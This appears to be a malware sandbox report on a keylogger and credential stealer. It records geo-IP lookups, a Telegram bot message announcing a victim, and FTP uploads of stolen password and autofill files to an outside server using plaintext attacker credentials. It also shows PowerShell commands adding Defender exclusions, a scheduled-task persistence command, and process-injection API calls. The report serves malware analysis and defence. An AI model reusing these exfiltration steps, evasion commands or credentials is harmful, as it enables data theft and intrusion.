                                                          2024-09-30 13:03:38 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                          2024-09-30 13:03:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.449776188.114.97.34437552C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-09-30 13:03:40 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                          Host: reallyfreegeoip.org
                                                          2024-09-30 13:03:40 UTC674INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:40 GMT
                                                          Content-Type: application/xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          vary: Accept-Encoding
                                                          Cache-Control: max-age=86400
                                                          CF-Cache-Status: HIT
                                                          Age: 17451
                                                          Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gFXJQW9EbE2XAy1FRABHzoIZ44i1T5QlDMR7kgRTLzxsw25RIIWgsNDfgWCIQlZWStBUhbrlJavgfzrspItAhwFCb48yret6apG7dLZBWB%2BlIXExvNSYNjO%2FP0tYdA0H1aGzXQo8"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8cb46a169c504380-EWR
                                                          2024-09-30 13:03:40 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                          2024-09-30 13:03:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.449777149.154.167.2204437552C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-09-30 13:03:41 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2015:48:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                          Host: api.telegram.org
                                                          Connection: Keep-Alive
                                                          2024-09-30 13:03:41 UTC344INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0
                                                          Date: Mon, 30 Sep 2024 13:03:41 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 55
                                                          Connection: close
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                          2024-09-30 13:03:41 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                          Sep 30, 2024 15:03:46.016311884 CEST214977845.143.99.52192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 16:03. Server port: 21.
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 16:03. Server port: 21.220-This is a private system - No anonymous login
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 16:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 16:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                          Sep 30, 2024 15:03:46.016669989 CEST4977821192.168.2.445.143.99.52USER humble@quicklyserv.com
                                                          Sep 30, 2024 15:03:46.239696026 CEST214977845.143.99.52192.168.2.4331 User humble@quicklyserv.com OK. Password required
                                                          Sep 30, 2024 15:03:46.252085924 CEST4977821192.168.2.445.143.99.52PASS omobolajijonze12345
                                                          Sep 30, 2024 15:03:46.557590961 CEST214977845.143.99.52192.168.2.4230 OK. Current restricted directory is /
                                                          Sep 30, 2024 15:03:46.787847042 CEST214977845.143.99.52192.168.2.4504 Unknown command
                                                          Sep 30, 2024 15:03:46.788162947 CEST4977821192.168.2.445.143.99.52PWD
                                                          Sep 30, 2024 15:03:47.012161016 CEST214977845.143.99.52192.168.2.4257 "/" is your current location
                                                          Sep 30, 2024 15:03:47.012475967 CEST4977821192.168.2.445.143.99.52TYPE I
                                                          Sep 30, 2024 15:03:47.236392021 CEST214977845.143.99.52192.168.2.4200 TYPE is now 8-bit binary
                                                          Sep 30, 2024 15:03:47.236560106 CEST4977821192.168.2.445.143.99.52PASV
                                                          Sep 30, 2024 15:03:47.460988045 CEST214977845.143.99.52192.168.2.4227 Entering Passive Mode (45,143,99,52,210,119)
                                                          Sep 30, 2024 15:03:47.466555119 CEST4977821192.168.2.445.143.99.52STOR 724536 - AutoFill ID - ZyiAEnXWZP942894092.txt
                                                          Sep 30, 2024 15:03:48.090451002 CEST214977845.143.99.52192.168.2.4150 Accepted data connection
                                                          Sep 30, 2024 15:03:48.314404011 CEST214977845.143.99.52192.168.2.4226-File successfully transferred
                                                          226-File successfully transferred226 0.226 seconds (measured here), 1.50 Kbytes per second
                                                          Sep 30, 2024 15:03:48.778403997 CEST214978045.143.99.52192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 16:03. Server port: 21.
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 16:03. Server port: 21.220-This is a private system - No anonymous login
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 16:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 16:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                          Sep 30, 2024 15:03:48.778809071 CEST4978021192.168.2.445.143.99.52USER humble@quicklyserv.com
                                                          Sep 30, 2024 15:03:48.996948004 CEST214978045.143.99.52192.168.2.4331 User humble@quicklyserv.com OK. Password required
                                                          Sep 30, 2024 15:03:48.997148991 CEST4978021192.168.2.445.143.99.52PASS omobolajijonze12345
                                                          Sep 30, 2024 15:03:49.243757963 CEST214978045.143.99.52192.168.2.4230 OK. Current restricted directory is /
                                                          Sep 30, 2024 15:03:49.471131086 CEST214978045.143.99.52192.168.2.4504 Unknown command
                                                          Sep 30, 2024 15:03:49.477092028 CEST4978021192.168.2.445.143.99.52PWD
                                                          Sep 30, 2024 15:03:49.694860935 CEST214978045.143.99.52192.168.2.4257 "/" is your current location
                                                          Sep 30, 2024 15:03:49.695204020 CEST4978021192.168.2.445.143.99.52TYPE I
                                                          Sep 30, 2024 15:03:49.916961908 CEST214978045.143.99.52192.168.2.4200 TYPE is now 8-bit binary
                                                          Sep 30, 2024 15:03:49.917089939 CEST4978021192.168.2.445.143.99.52PASV
                                                          Sep 30, 2024 15:03:50.136060953 CEST214978045.143.99.52192.168.2.4227 Entering Passive Mode (45,143,99,52,203,192)
                                                          Sep 30, 2024 15:03:50.141524076 CEST4978021192.168.2.445.143.99.52STOR 724536 - Passwords ID - ZyiAEnXWZP471134058.txt
                                                          Sep 30, 2024 15:03:50.742501974 CEST214978045.143.99.52192.168.2.4150 Accepted data connection
                                                          Sep 30, 2024 15:03:50.961141109 CEST214978045.143.99.52192.168.2.4226-File successfully transferred
                                                          226-File successfully transferred226 0.218 seconds (measured here), 1.53 Kbytes per second
                                                          Sep 30, 2024 15:04:00.043103933 CEST4978021192.168.2.445.143.99.52PASV
                                                          Sep 30, 2024 15:04:00.260845900 CEST214978045.143.99.52192.168.2.4227 Entering Passive Mode (45,143,99,52,212,192)
                                                          Sep 30, 2024 15:04:00.266684055 CEST4978021192.168.2.445.143.99.52STOR 724536 - AutoFill ID - ZyiAEnXWZP471134058.txt
                                                          Sep 30, 2024 15:04:01.029295921 CEST214978045.143.99.52192.168.2.4150 Accepted data connection
                                                          Sep 30, 2024 15:04:01.251184940 CEST214978045.143.99.52192.168.2.4226-File successfully transferred
                                                          226-File successfully transferred226 0.383 seconds (measured here), 0.89 Kbytes per second

                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:09:02:55
                                                          Start date:30/09/2024
                                                          Path:C:\Users\user\Desktop\3140, EUR.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\3140, EUR.exe"
                                                          Imagebase:0x400000
                                                          File size:815'104 bytes
                                                          MD5 hash:332593AE1E0BA5A06370963C37BBBCEB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:09:03:01
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe"
                                                          Imagebase:0x280000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:09:03:01
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:09:03:01
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
                                                          Imagebase:0x280000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:09:03:01
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:09:03:01
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp"
                                                          Imagebase:0xb80000
                                                          File size:187'904 bytes
                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:09:03:01
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:09:03:02
                                                          Start date:30/09/2024
                                                          Path:C:\Users\user\Desktop\3140, EUR.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\3140, EUR.exe"
                                                          Imagebase:0xd20000
                                                          File size:815'104 bytes
                                                          MD5 hash:332593AE1E0BA5A06370963C37BBBCEB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.4122819893.000000000318E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4122819893.0000000003117000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4119574462.000000000043E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:9
                                                          Start time:09:03:03
                                                          Start date:30/09/2024
                                                          Path:C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          Imagebase:0x500000
                                                          File size:815'104 bytes
                                                          MD5 hash:332593AE1E0BA5A06370963C37BBBCEB
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 47%, ReversingLabs
                                                          • Detection: 44%, Virustotal, Browse
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:09:03:03
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                          Imagebase:0x7ff693ab0000
                                                          File size:496'640 bytes
                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                          Has elevated privileges:true
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:09:03:09
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmp4A2.tmp"
                                                          Imagebase:0xb80000
                                                          File size:187'904 bytes
                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:09:03:09
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:13
                                                          Start time:09:03:09
                                                          Start date:30/09/2024
                                                          Path:C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
                                                          Imagebase:0x50000
                                                          File size:815'104 bytes
                                                          MD5 hash:332593AE1E0BA5A06370963C37BBBCEB
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:09:03:10
                                                          Start date:30/09/2024
                                                          Path:C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
                                                          Imagebase:0x350000
                                                          File size:815'104 bytes
                                                          MD5 hash:332593AE1E0BA5A06370963C37BBBCEB
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:15
                                                          Start time:09:03:10
                                                          Start date:30/09/2024
                                                          Path:C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
                                                          Imagebase:0xeb0000
                                                          File size:815'104 bytes
                                                          MD5 hash:332593AE1E0BA5A06370963C37BBBCEB
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000F.00000002.4122549015.000000000337F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:false

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:8.4%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:39
                                                            Total number of Limit Nodes:2
                                                            execution_graph 31286 764eed0 31287 764ef59 CreateProcessA 31286->31287 31289 764f11b 31287->31289 31265 764b73d 31266 764b74d 31265->31266 31268 764e1d8 ResumeThread 31266->31268 31269 764e1ca ResumeThread 31266->31269 31267 764b774 31268->31267 31269->31267 31270 764ed38 31271 764ed83 ReadProcessMemory 31270->31271 31273 764edc7 31271->31273 31274 764e678 31275 764e6bd Wow64SetThreadContext 31274->31275 31277 764e705 31275->31277 31278 764eb88 31279 764ebc8 VirtualAllocEx 31278->31279 31281 764ec05 31279->31281 31282 764ec48 31283 764ec90 WriteProcessMemory 31282->31283 31285 764ece7 31283->31285 31242 afba60 31243 afbaa8 GetModuleHandleW 31242->31243 31244 afbaa2 31242->31244 31245 afbad5 31243->31245 31244->31243 31246 764b66b 31247 764b67b 31246->31247 31251 764e1d8 31247->31251 31255 764e1ca 31247->31255 31248 764b5ed 31252 764e20b 31251->31252 31253 764e279 31252->31253 31260 764e560 31252->31260 31253->31248 31256 764e177 31255->31256 31257 764e1d2 31255->31257 31256->31248 31258 764e279 31257->31258 31259 764e560 ResumeThread 31257->31259 31258->31248 31259->31258 31261 764e5c8 ResumeThread 31260->31261 31263 764e56f 31260->31263 31264 764e639 31261->31264 31263->31253 31264->31253

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 785e0c0-785e103 2 785e105 0->2 3 785e10a-785e164 0->3 2->3 6 785e167 3->6 7 785e16e-785e18a 6->7 8 785e193-785e194 7->8 9 785e18c 7->9 10 785e2d0-785e340 8->10 11 785e199-785e1c7 8->11 9->6 9->10 9->11 12 785e2a1-785e2cb 9->12 13 785e212-785e227 9->13 14 785e22c-785e230 9->14 15 785e25c-785e29c 9->15 16 785e1c9-785e20d 9->16 32 785e342 call 7640645 10->32 33 785e342 call 7640780 10->33 34 785e342 call 7640040 10->34 35 785e342 call 764001e 10->35 36 785e342 call 7640859 10->36 11->7 12->7 13->7 17 785e243-785e24a 14->17 18 785e232-785e241 14->18 15->7 16->7 19 785e251-785e257 17->19 18->19 19->7 31 785e348-785e352 32->31 33->31 34->31 35->31 36->31
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1742500185.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7850000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Te^q$Te^q
                                                            • API String ID: 0-3743469327
                                                            • Opcode ID: 9e7a8aab14c6c1d737cb1f1a0e700b4031d35a66b0dea5bf69b7e8660d44ab00
                                                            • Instruction ID: a9a8a3dea4a6e45557200f36b7f592ca75398e418b42066d31ee967ef7fe7694
                                                            • Opcode Fuzzy Hash: 9e7a8aab14c6c1d737cb1f1a0e700b4031d35a66b0dea5bf69b7e8660d44ab00
                                                            • Instruction Fuzzy Hash: 2781C2B4E012198FDB08DFE9C9846EEBBF2BF89301F24852AD815AB354DB359905CF54

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 37 785e0e0-785e103 38 785e105 37->38 39 785e10a-785e164 37->39 38->39 42 785e167 39->42 43 785e16e-785e18a 42->43 44 785e193-785e194 43->44 45 785e18c 43->45 46 785e2d0-785e340 44->46 47 785e199-785e1c7 44->47 45->42 45->46 45->47 48 785e2a1-785e2cb 45->48 49 785e212-785e227 45->49 50 785e22c-785e230 45->50 51 785e25c-785e29c 45->51 52 785e1c9-785e20d 45->52 68 785e342 call 7640645 46->68 69 785e342 call 7640780 46->69 70 785e342 call 7640040 46->70 71 785e342 call 764001e 46->71 72 785e342 call 7640859 46->72 47->43 48->43 49->43 53 785e243-785e24a 50->53 54 785e232-785e241 50->54 51->43 52->43 55 785e251-785e257 53->55 54->55 55->43 67 785e348-785e352 68->67 69->67 70->67 71->67 72->67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1742500185.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7850000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Te^q$Te^q
                                                            • API String ID: 0-3743469327
                                                            • Opcode ID: 5491e7101d41ce0c80bf416755934399e489791f8a24a067ce7e02526842816d
                                                            • Instruction ID: 4352bb4ae2c492c5d64b61e5cbdfbe6302477a5e5ca6b870919c90b35a232b5f
                                                            • Opcode Fuzzy Hash: 5491e7101d41ce0c80bf416755934399e489791f8a24a067ce7e02526842816d
